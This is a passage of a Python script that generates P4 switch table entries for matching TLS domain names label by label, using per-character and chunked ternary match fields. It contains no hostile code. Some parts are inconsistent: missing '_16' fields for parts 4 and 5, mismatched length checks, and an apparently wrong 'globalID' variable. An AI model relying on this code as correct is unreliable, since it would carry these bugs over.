elif (partNum == 2):\n partsDict = {\n \"headers.q2_1.char\": [0, 255],\n \"headers.q2_2.char\": [0, 255],\n \"headers.q2_3.char\": [0, 255],\n \"headers.q2_4.char\": [0, 255],\n \"headers.q2_5.char\": [0, 255],\n \"headers.q2_6.char\": [0, 255],\n \"headers.q2_7.char\": [0, 255],\n \"headers.q2_8.char\": [0, 255],\n \"headers.q2_9.char\": [0, 255],\n \"headers.q2_10.char\": [0, 255],\n \"headers.q2_11.char\": [0, 255],\n \"headers.q2_12.char\": [0, 255],\n \"headers.q2_13.char\": [0, 255],\n \"headers.q2_14.char\": [0, 255],\n \"headers.q2_15.char\": [0, 255],\n \"headers.q2_16.char\": [0, 255],\n \"headers.q2_17.char\": [0, 255],\n \"headers.q2_18.char\": [0, 255],\n \"headers.q2_19.char\": [0, 255],\n \"headers.q2_20.char\": [0, 255],\n \"headers.q2_21.char\": [0, 255],\n \"headers.q2_22.char\": [0, 255],\n \"headers.q2_23.char\": [0, 255],\n \"headers.q2_24.char\": [0, 255],\n \"headers.q2_25.char\": [0, 255],\n \"headers.q2_26.char\": [0, 255],\n \"headers.q2_27.char\": [0, 255],\n \"headers.q2_28.char\": [0, 255],\n \"headers.q2_29.char\": [0, 255],\n \"headers.q2_30.char\": [0, 255],\n \"headers.q2_31.char\": [0, 255],\n \"headers.q2_32.char\": [0, 255]\n }\n return partsDict\n elif (partNum == 3):\n partsDict = {\n \"headers.q3_1.char\": [0, 255],\n \"headers.q3_2.char\": [0, 255],\n \"headers.q3_3.char\": [0, 255],\n \"headers.q3_4.char\": [0, 255],\n \"headers.q3_5.char\": [0, 255],\n \"headers.q3_6.char\": [0, 255],\n \"headers.q3_7.char\": [0, 255],\n \"headers.q3_8.char\": [0, 255],\n \"headers.q3_9.char\": [0, 255],\n \"headers.q3_10.char\": [0, 255],\n \"headers.q3_11.char\": [0, 255],\n \"headers.q3_12.char\": [0, 255],\n \"headers.q3_13.char\": [0, 255],\n \"headers.q3_14.char\": [0, 255],\n \"headers.q3_15.char\": [0, 255],\n \"headers.q3_16.char\": [0, 255],\n \"headers.q3_17.char\": [0, 255],\n \"headers.q3_18.char\": [0, 255],\n \"headers.q3_19.char\": [0, 255],\n \"headers.q3_20.char\": [0, 255],\n \"headers.q3_21.char\": [0, 255],\n \"headers.q3_22.char\": [0, 255],\n \"headers.q3_23.char\": [0, 255],\n \"headers.q3_24.char\": [0, 255],\n \"headers.q3_25.char\": [0, 255],\n \"headers.q3_26.char\": [0, 255],\n \"headers.q3_27.char\": [0, 255],\n \"headers.q3_28.char\": [0, 255],\n \"headers.q3_29.char\": [0, 255],\n \"headers.q3_30.char\": [0, 255],\n \"headers.q3_31.char\": [0, 255],\n 
\"headers.q3_32.char\": [0, 255]\n }\n return partsDict\n elif (partNum == 4):\n partsDict = {\n \"headers.q4_1.char\": [0, 255],\n \"headers.q4_2.char\": [0, 255],\n \"headers.q4_3.char\": [0, 255],\n \"headers.q4_4.char\": [0, 255],\n \"headers.q4_5.char\": [0, 255],\n \"headers.q4_6.char\": [0, 255],\n \"headers.q4_7.char\": [0, 255],\n \"headers.q4_8.char\": [0, 255],\n \"headers.q4_9.char\": [0, 255],\n \"headers.q4_10.char\": [0, 255],\n \"headers.q4_11.char\": [0, 255],\n \"headers.q4_12.char\": [0, 255],\n \"headers.q4_13.char\": [0, 255],\n \"headers.q4_14.char\": [0, 255],\n \"headers.q4_15.char\": [0, 255],\n \"headers.q4_17.char\": [0, 255],\n \"headers.q4_18.char\": [0, 255],\n \"headers.q4_19.char\": [0, 255],\n \"headers.q4_20.char\": [0, 255],\n \"headers.q4_21.char\": [0, 255],\n \"headers.q4_22.char\": [0, 255],\n \"headers.q4_23.char\": [0, 255],\n \"headers.q4_24.char\": [0, 255],\n \"headers.q4_25.char\": [0, 255],\n \"headers.q4_26.char\": [0, 255],\n \"headers.q4_27.char\": [0, 255],\n \"headers.q4_28.char\": [0, 255],\n \"headers.q4_29.char\": [0, 255],\n \"headers.q4_30.char\": [0, 255],\n \"headers.q4_31.char\": [0, 255],\n \"headers.q4_32.char\": [0, 255]\n }\n return partsDict\n elif (partNum == 5):\n partsDict = {\n \"headers.q5_1.char\": [0, 255],\n \"headers.q5_2.char\": [0, 255],\n \"headers.q5_3.char\": [0, 255],\n \"headers.q5_4.char\": [0, 255],\n \"headers.q5_5.char\": [0, 255],\n \"headers.q5_6.char\": [0, 255],\n \"headers.q5_7.char\": [0, 255],\n \"headers.q5_8.char\": [0, 255],\n \"headers.q5_9.char\": [0, 255],\n \"headers.q5_10.char\": [0, 255],\n \"headers.q5_11.char\": [0, 255],\n \"headers.q5_12.char\": [0, 255],\n \"headers.q5_13.char\": [0, 255],\n \"headers.q5_14.char\": [0, 255],\n \"headers.q5_15.char\": [0, 255],\n \"headers.q5_17.char\": [0, 255],\n \"headers.q5_18.char\": [0, 255],\n \"headers.q5_19.char\": [0, 255],\n \"headers.q5_20.char\": [0, 255],\n \"headers.q5_21.char\": [0, 255],\n \"headers.q5_22.char\": [0, 255],\n \"headers.q5_23.char\": [0, 255],\n \"headers.q5_24.char\": [0, 255],\n \"headers.q5_25.char\": [0, 255],\n \"headers.q5_26.char\": [0, 255],\n \"headers.q5_27.char\": [0, 255],\n \"headers.q5_28.char\": [0, 255],\n \"headers.q5_29.char\": [0, 255],\n \"headers.q5_30.char\": [0, 255],\n \"headers.q5_31.char\": [0, 255],\n }\n return partsDict\n return -1\n\ndef addPart1ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q1_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q1_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q1_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q1_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q1_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q1_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q1_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q1_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q1_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q1_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q1_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q1_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q1_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q1_14.char\"] = [part[i], 255]\n elif (i == 14):\n 
partsDict[\"headers.q1_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q1_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q1_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q1_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q1_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q1_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q1_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q1_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q1_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q1_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q1_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q1_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q1_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q1_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q1_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q1_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q1_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q1_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart2ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q2_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q2_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q2_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q2_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q2_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q2_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q2_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q2_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q2_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q2_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q2_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q2_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q2_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q2_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q2_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q2_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q2_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q2_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q2_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q2_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q2_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q2_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q2_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q2_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q2_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q2_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q2_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q2_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q2_29.char\"] = [part[i], 255]\n elif (i == 29):\n 
partsDict[\"headers.q2_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q2_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q2_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart3ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q3_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q3_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q3_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q3_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q3_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q3_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q3_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q3_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q3_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q3_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q3_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q3_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q3_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q3_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q3_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q3_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q3_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q3_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q3_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q3_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q3_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q3_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q3_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q3_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q3_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q3_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q3_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q3_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q3_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q3_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q3_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q3_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart4ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 32):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q4_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q4_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q4_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q4_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q4_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q4_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q4_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q4_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q4_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q4_10.char\"] = [part[i], 255]\n elif (i 
== 10):\n partsDict[\"headers.q4_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q4_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q4_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q4_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q4_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q4_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q4_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q4_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q4_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q4_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q4_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q4_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q4_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q4_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q4_25.char\"] = [part[i], 255]\n elif (i == 25):\n partsDict[\"headers.q4_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q4_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q4_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q4_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q4_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q4_31.char\"] = [part[i], 255]\n elif (i == 31):\n partsDict[\"headers.q4_32.char\"] = [part[i], 255]\n\n return partsDict\n\ndef addPart5ToDictT(part, partsDict):\n\n part_len = len(part)\n if (part_len > 31):\n print(\"Domain with part longer than 31 characters\")\n exit(-1)\n\n for i in range(part_len):\n if (i == 0):\n partsDict[\"headers.q5_1.char\"] = [part[i], 255]\n elif (i == 1):\n partsDict[\"headers.q5_2.char\"] = [part[i], 255]\n elif (i == 2):\n partsDict[\"headers.q5_3.char\"] = [part[i], 255]\n elif (i == 3):\n partsDict[\"headers.q5_4.char\"] = [part[i], 255]\n elif (i == 4):\n partsDict[\"headers.q5_5.char\"] = [part[i], 255]\n elif (i == 5):\n partsDict[\"headers.q5_6.char\"] = [part[i], 255]\n elif (i == 6):\n partsDict[\"headers.q5_7.char\"] = [part[i], 255]\n elif (i == 7):\n partsDict[\"headers.q5_8.char\"] = [part[i], 255]\n elif (i == 8):\n partsDict[\"headers.q5_9.char\"] = [part[i], 255]\n elif (i == 9):\n partsDict[\"headers.q5_10.char\"] = [part[i], 255]\n elif (i == 10):\n partsDict[\"headers.q5_11.char\"] = [part[i], 255]\n elif (i == 11):\n partsDict[\"headers.q5_12.char\"] = [part[i], 255]\n elif (i == 12):\n partsDict[\"headers.q5_13.char\"] = [part[i], 255]\n elif (i == 13):\n partsDict[\"headers.q5_14.char\"] = [part[i], 255]\n elif (i == 14):\n partsDict[\"headers.q5_15.char\"] = [part[i], 255]\n elif (i == 15):\n partsDict[\"headers.q5_16.char\"] = [part[i], 255]\n elif (i == 16):\n partsDict[\"headers.q5_17.char\"] = [part[i], 255]\n elif (i == 17):\n partsDict[\"headers.q5_18.char\"] = [part[i], 255]\n elif (i == 18):\n partsDict[\"headers.q5_19.char\"] = [part[i], 255]\n elif (i == 19):\n partsDict[\"headers.q5_20.char\"] = [part[i], 255]\n elif (i == 20):\n partsDict[\"headers.q5_21.char\"] = [part[i], 255]\n elif (i == 21):\n partsDict[\"headers.q5_22.char\"] = [part[i], 255]\n elif (i == 22):\n partsDict[\"headers.q5_23.char\"] = [part[i], 255]\n elif (i == 23):\n partsDict[\"headers.q5_24.char\"] = [part[i], 255]\n elif (i == 24):\n partsDict[\"headers.q5_25.char\"] = [part[i], 255]\n elif (i == 25):\n 
partsDict[\"headers.q5_26.char\"] = [part[i], 255]\n elif (i == 26):\n partsDict[\"headers.q5_27.char\"] = [part[i], 255]\n elif (i == 27):\n partsDict[\"headers.q5_28.char\"] = [part[i], 255]\n elif (i == 28):\n partsDict[\"headers.q5_29.char\"] = [part[i], 255]\n elif (i == 29):\n partsDict[\"headers.q5_30.char\"] = [part[i], 255]\n elif (i == 30):\n partsDict[\"headers.q5_31.char\"] = [part[i], 255]\n return partsDict\n\npart5DictT = {}\npart4DictT = {}\npart3DictT = {}\npart2DictT = {}\npart1DictT = {}\n\n# If len(parts)==1\ndef onepartsT(parts):\n if parts[0] in part1DictT:\n return part1DictT[parts[0]]\n if (parts[0] == '*' and '*.' in part1DictT):\n return part1DictT['*.']\n if (parts[0] == '*.' and '*' in part1DictT):\n return part1DictT['*']\n\n global globalID1T\n global priority1T\n globalID1T = globalID1T + 1\n part1DictT[parts[0]] = globalID1T\n\n if (parts[0] == '*' or parts[0] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q1\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": 1,\n \"action_params\": {\"q1id\": globalID1T}\n })\n return globalID1T\n\n dict_t = dictSetUpT(1)\n addPart1ToDictT(parts[0], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q1\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": priority1T,\n \"action_params\": {\"q1id\": globalID1T}\n })\n priority1T = priority1T - 1\n\n return globalID1T\n\n# If len(parts)==2\ndef twopartsT(parts):\n \n if parts[1] in part2DictT:\n return part2DictT[parts[1]]\n if (parts[1] == '*' and '*.' in part2DictT):\n return part2DictT['*.']\n if (parts[1] == '*.' and '*' in part2DictT):\n return part2DictT['*']\n\n global globalID2T\n global priority2T\n globalID2T = globalID2T + 1\n part2DictT[parts[1]] = globalID2T\n\n if (parts[1] == '*' or parts[1] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q2\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": 1,\n \"action_params\": {\"q2id\": globalID2T}\n })\n return globalID2T\n\n dict_t = dictSetUpT(2)\n addPart2ToDictT(parts[1], dict_t)\n\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q2\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": priority2T,\n \"action_params\": {\"q2id\": globalID2T}\n })\n priority2T = priority2T - 1\n return globalID2T\n\n# If len(parts)==3\ndef threepartsT(parts):\n \n if parts[2] in part3DictT:\n return part3DictT[parts[2]]\n if (parts[2] == '*' and '*.' in part3DictT):\n return part3DictT['*.']\n if (parts[2] == '*.' 
and '*' in part3DictT):\n return part3DictT['*']\n\n global globalID3T\n global priority3T\n globalID3T = globalID3T + 1\n part3DictT[parts[2]] = globalID3T\n\n if (parts[2] == '*' or parts[2] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q3\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": 1,\n \"action_params\": {\"q3id\": globalID3T}\n })\n return globalID3T\n\n dict_t = dictSetUpT(3)\n addPart3ToDictT(parts[2], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q3\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": priority3T,\n \"action_params\": {\"q3id\": globalID3T}\n })\n priority3T = priority3T - 1\n return globalID3T\n\n# If len(parts)==4\ndef fourpartsT(parts):\n \n if parts[3] in part4DictT:\n return part4DictT[parts[3]]\n if (parts[3] == '*' and '*.' in part4DictT):\n return part4DictT['*.']\n if (parts[3] == '*.' and '*' in part4DictT):\n return part4DictT['*']\n\n global globalID4T\n global priority4T\n globalID4T = globalID4T + 1\n part4DictT[parts[3]] = globalID4T\n\n if (parts[3] == '*' or parts[3] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q4\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": 1,\n \"action_params\": {\"q4id\": globalID4T}\n })\n return globalID4T\n\n dict_t = dictSetUpT(4)\n addPart4ToDictT(parts[3], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q4\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": priority4T,\n \"action_params\": {\"q4id\": globalID4T}\n })\n priority4T = priority4T - 1\n return globalID4T\n\n# If len(parts)==5\ndef fivepartsT(parts):\n \n if parts[4] in part5DictT:\n return part5DictT[parts[4]]\n if (parts[4] == '*' and '*.' in part5DictT):\n return part5DictT['*.']\n if (parts[4] == '*.' 
and '*' in part5DictT):\n return part5DictT['*']\n\n global globalID5T\n global priority5T\n globalID5T = globalID5T + 1\n part5DictT[parts[4]] = globalID5T\n\n if (parts[4] == '*' or parts[4] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q5\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": 1,\n \"action_params\": {\"q5id\": globalID5T}\n })\n return globalID5T\n\n dict_t = dictSetUpT(5)\n addPart5ToDictT(parts[4], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q5\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": priority5T,\n \"action_params\": {\"q5id\": globalID5T}\n })\n priority5T = priority5T - 1\n return globalID5T\n\ndef creatDomainEntryT(parts):\n id5 = fivepartsT(parts)\n id4 = fourpartsT(parts)\n id3 = threepartsT(parts)\n id2 = twopartsT(parts)\n id1 = onepartsT(parts)\n\n global globalIDT\n globalIDT = globalIDT + 1\n\n idDict = {\n \"user_metadata.q1_id\": id1,\n \"user_metadata.q2_id\": id2,\n \"user_metadata.q3_id\": id3,\n \"user_metadata.q4_id\": id4,\n \"user_metadata.q5_id\": id5\n }\n\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsmatch_known_domain_list\",\n \"match\": idDict,\n \"action_name\": \"TopIngress.match_domain\",\n \"action_params\": {\"id\": globalID}\n })\n\ndef dictSetUp(partNum):\n if (partNum == 1):\n partsDict = {\n \"headers.q1_part1.part\": [0, 255],\n \"headers.q1_part2.part\": [0, 65535],\n \"headers.q1_part4.part\": [0, 4294967295],\n \"headers.q1_part8_1.part\": [0, 4294967295],\n \"headers.q1_part8_2.part\": [0, 4294967295],\n \"headers.q1_part16_1.part\": [0, 4294967295],\n \"headers.q1_part16_2.part\": [0, 4294967295],\n \"headers.q1_part16_3.part\": [0, 4294967295],\n \"headers.q1_part16_4.part\": [0, 4294967295]\n }\n return partsDict\n elif (partNum == 2):\n partsDict = {\n \"headers.q2_part1.part\": [0, 255],\n \"headers.q2_part2.part\": [0, 65535],\n \"headers.q2_part4.part\": [0, 4294967295],\n \"headers.q2_part8_1.part\": [0, 4294967295],\n \"headers.q2_part8_2.part\": [0, 4294967295],\n \"headers.q2_part16_1.part\": [0, 4294967295],\n \"headers.q2_part16_2.part\": [0, 4294967295],\n \"headers.q2_part16_3.part\": [0, 4294967295],\n \"headers.q2_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n elif (partNum == 3):\n partsDict = {\n \"headers.q3_part1.part\": [0, 255],\n \"headers.q3_part2.part\": [0, 65535],\n \"headers.q3_part4.part\": [0, 4294967295],\n \"headers.q3_part8_1.part\": [0, 4294967295],\n \"headers.q3_part8_2.part\": [0, 4294967295],\n \"headers.q3_part16_1.part\": [0, 4294967295],\n \"headers.q3_part16_2.part\": [0, 4294967295],\n \"headers.q3_part16_3.part\": [0, 4294967295],\n \"headers.q3_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n elif (partNum == 4):\n partsDict = {\n \"headers.q4_part1.part\": [0, 255],\n \"headers.q4_part2.part\": [0, 65535],\n \"headers.q4_part4.part\": [0, 4294967295],\n \"headers.q4_part8_1.part\": [0, 4294967295],\n \"headers.q4_part8_2.part\": [0, 4294967295],\n \"headers.q4_part16_1.part\": [0, 4294967295],\n \"headers.q4_part16_2.part\": [0, 4294967295],\n \"headers.q4_part16_3.part\": [0, 4294967295],\n \"headers.q4_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n elif (partNum == 5):\n partsDict = {\n \"headers.q5_part1.part\": [0, 255],\n \"headers.q5_part2.part\": [0, 65535],\n \"headers.q5_part4.part\": [0, 4294967295],\n \"headers.q5_part8_1.part\": [0, 4294967295],\n 
\"headers.q5_part8_2.part\": [0, 4294967295],\n \"headers.q5_part16_1.part\": [0, 4294967295],\n \"headers.q5_part16_2.part\": [0, 4294967295],\n \"headers.q5_part16_3.part\": [0, 4294967295],\n \"headers.q5_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n return -1\n\n \n# Outputs a reversed, 5 digit, binary representation\ndef toReversedBinary(num):\n num1 = bin(num)[2::] # cut out 0b prefix\n if len(num1) >= 5:\n num1 = num1[len(num1)-5:len(num1):]\n else:\n for i in range(0, 5-len(num1)):\n num1 = '0' + num1\n return num1[::-1]\n\ndef addPart1ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q1_part1.part\")\n partsDict.pop(\"headers.q1_part2.part\")\n partsDict.pop(\"headers.q1_part4.part\")\n partsDict.pop(\"headers.q1_part8_1.part\")\n partsDict.pop(\"headers.q1_part8_2.part\")\n partsDict.pop(\"headers.q1_part16_1.part\")\n partsDict.pop(\"headers.q1_part16_2.part\")\n partsDict.pop(\"headers.q1_part16_3.part\")\n partsDict.pop(\"headers.q1_part16_4.part\")\n return partsDict\n\n part1Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part1Spec[0] == '1':\n partsDict[\"headers.q1_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part1Spec[1] == '1':\n partsDict[\"headers.q1_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part1Spec[2] == '1':\n partsDict[\"headers.q1_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part1Spec[3] == '1':\n partsDict[\"headers.q1_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part1Spec[4] == '1':\n partsDict[\"headers.q1_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart2ToDict(part, partsDict):\n if (part == '*'):\n 